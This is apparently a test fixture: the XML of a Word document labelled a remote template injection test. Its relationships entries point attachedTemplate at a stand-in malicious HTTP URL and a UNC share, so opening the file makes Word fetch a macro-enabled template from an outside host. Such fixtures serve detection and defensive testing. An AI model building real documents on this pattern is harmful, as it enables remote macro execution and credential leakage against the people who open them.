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>REMOTE TEMPLATE INJECTION TEST</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>This document loads a remote template that may contain macros.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Template URL: http://malicious-site.example.com/template.dotm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>When opened, Word will attempt to download and execute the remote template.</w:t>
      </w:r>
    </w:p>
  </w:body>
</w:document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attachedTemplate" Target="http://malicious-site.example.com/template.dotm" TargetMode="External"/>
    <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="\\malicious-server\share\template.dotm" TargetMode="External"/>
</Relationships>
</file>